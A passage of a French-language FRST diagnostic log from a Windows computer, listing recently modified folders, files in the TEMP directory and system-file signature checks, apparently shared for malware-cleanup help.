C:\Users\Arnaud\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\腾讯软件 2016-07-14 11:11 - 2015-10-02 11:05 - 00000000 ____D C:\ProgramData\Tencent 2016-07-13 12:47 - 2016-03-03 16:27 - 00000000 ____D C:\output 2016-07-13 12:47 - 2016-03-03 16:26 - 00000000 ____D C:\PDF2JPG 2016-07-13 12:47 - 2015-12-02 16:44 - 00000000 ____D C:\temp 2016-07-13 12:47 - 2015-10-12 11:23 - 00000000 ____D C:\QMDownload 2016-07-13 12:47 - 2015-04-22 09:48 - 00000000 ____D C:\MSDEV 2016-07-13 12:47 - 2015-03-24 15:34 - 00000000 ____D C:\VC 2016-07-13 12:47 - 2015-02-08 18:46 - 00000000 ____D C:\tmp 2016-07-13 12:47 - 2015-02-08 18:46 - 00000000 ____D C:\Cast3M 2016-07-13 12:47 - 2014-12-26 19:20 - 00000000 ____D C:\watcom-1.3 2016-07-13 12:47 - 2014-10-05 18:43 - 00000000 ____D C:\Photoshine 2016-07-13 12:47 - 2014-10-05 18:31 - 00000000 ____D C:\DICOBAT 2016-07-13 12:47 - 2014-09-30 10:03 - 00000000 ____D C:\SolidWorks Data 2016-07-13 12:47 - 2014-09-30 09:27 - 00000000 ____D C:\dessins 2016-07-13 12:46 - 2014-11-16 19:11 - 00000000 ____D C:\Autodesk 2016-07-13 12:46 - 2014-09-27 15:23 - 00000000 ____D C:\CamersoftOutput 2016-07-13 12:44 - 2015-10-16 10:54 - 00039928 _____ (Tencent) C:\Windows\system32\Drivers\TS888.sys 2016-07-13 12:44 - 2015-10-02 11:19 - 00000000 ____D C:\ProgramData\TXQMPC 2016-06-28 15:32 - 2009-07-14 03:37 - 00000000 __RHD C:\Users\Public\Libraries 2016-06-28 15:27 - 2015-10-13 13:35 - 00000000 ____D C:\ProgramData\BlueStacksSetup 2016-06-28 10:52 - 2009-07-14 03:37 - 00000000 ____D C:\Windows\system32\Setup 2016-06-27 15:19 - 2015-10-02 11:06 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\Tencent ==================== Fichiers à la racine de certains dossiers ======= 2015-03-28 20:09 - 2015-03-28 20:09 - 0001424 _____ () C:\Program Files\DeIsL1.isu 2015-10-07 10:56 - 2015-10-07 10:56 - 4875861 _____ () C:\Program Files\Common Files\umxmajzc.exe 2016-05-09 19:14 - 2016-07-25 11:08 - 0011264 _____ () C:\Users\Arnaud\AppData\Roaming\CDRusersDB.v12 2014-09-30 17:53 - 2014-11-13 07:05 - 0000141 _____ () C:\Users\Arnaud\AppData\Roaming\default.rss 2015-11-27 09:50 - 2015-11-27 09:50 - 0005120 _____ () C:\Users\Arnaud\AppData\Roaming\GiftBag.db 2015-05-07 14:03 - 2015-05-27 04:00 - 0001612 _____ () C:\Users\Arnaud\AppData\Roaming\gnuplot_history 2014-10-04 08:37 - 2015-03-01 23:13 - 0005120 _____ () C:\Users\Arnaud\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2016-07-22 15:38 - 2016-07-22 15:38 - 0000036 _____ () C:\Users\Arnaud\AppData\Local\housecall.guid.cache 2015-10-02 10:12 - 2015-10-02 10:11 - 0000187 _____ () C:\Users\Arnaud\AppData\Local\Matity.exe.config 2016-07-24 20:18 - 2016-07-24 20:18 - 0000000 ____H () C:\ProgramData\cm-lock 2014-09-29 06:13 - 2014-09-29 06:13 - 0000147 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.351.32.bc 2015-10-12 11:55 - 2015-10-12 11:55 - 0000080 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc 2016-07-13 12:47 - 2016-07-13 12:47 - 0001206 _____ () C:\ProgramData\ProgramData.lnk.lnk Certains fichiers dans TEMP: ==================== C:\Users\Arnaud\AppData\Local\Temp\AcDeltree.exe C:\Users\Arnaud\AppData\Local\Temp\cdo1278827091.dll C:\Users\Arnaud\AppData\Local\Temp\cdo2045704564.dll C:\Users\Arnaud\AppData\Local\Temp\cdo4272549365.dll C:\Users\Arnaud\AppData\Local\Temp\Checkupdate.exe C:\Users\Arnaud\AppData\Local\Temp\Foxit Reader Updater.exe C:\Users\Arnaud\AppData\Local\Temp\gcapi_dll.dll C:\Users\Arnaud\AppData\Local\Temp\gtapi_signed.dll C:\Users\Arnaud\AppData\Local\Temp\PCMgr_Setup_11_4_17347_218.exe C:\Users\Arnaud\AppData\Local\Temp\PCMgr_Setup_11_6_17645_227.exe C:\Users\Arnaud\AppData\Local\Temp\SkypeSetup.exe ==================== Bamital & volsnap ================= (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.) C:\Windows\explorer.exe => Le fichier est signé numériquement C:\Windows\system32\winlogon.exe => Le fichier est signé numériquement C:\Windows\system32\wininit.exe => Le fichier est signé numériquement C:\Windows\system32\svchost.exe => Le fichier est signé numériquement C:\Windows\system32\services.exe => Le fichier est signé numériquement C:\Windows\system32\User32.dll => Le MD5 est légitime C:\Windows\system32\userinit.exe => Le fichier est signé numériquement C:\Windows\system32\rpcss.dll => Le fichier est signé numériquement C:\Windows\system32\dnsapi.dll => Le fichier est signé numériquement C:\Windows\system32\Drivers\volsnap.sys => Le fichier est signé numériquement LastRegBack: 2016-07-18 12:20 ==================== Fin de FRST.txt ============================